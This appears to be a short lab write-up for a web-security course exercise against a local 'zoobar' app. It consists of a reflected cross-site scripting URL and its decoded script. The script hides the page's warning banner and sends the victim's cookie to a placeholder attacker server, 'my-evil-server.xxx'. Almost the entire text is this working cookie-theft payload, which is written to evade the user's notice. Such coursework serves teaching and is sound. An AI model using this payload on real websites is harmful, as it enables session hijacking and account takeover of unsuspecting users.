http://localhost:8080/zoobar/index.cgi/users?user=%22%22%3E%3Cscript%3Ewindow.onload%20=%20function(e)%20%7B%20document.getElementsByClassName(%22warning%22)%5B0%5D.style.display%20=%20%22none%22;%20new%20Image().src=%5B%22http://my-evil-server.xxx/?stolen_cookie=%22,%20document.cookie%5D.join(%22%22)%20%7D%3C/script%3E%3C/

The URL injects the following script, which first hides the red warning label
and then issues a request to our hypothetical attack server with the stolen
cookie:

  window.onload = function(e) {
    document.getElementsByClassName('warning')[0].style.display = 'none';
    new Image().src=['http://my-evil-server.xxx/?stolen_cookie=', document.cookie].join('')
  }







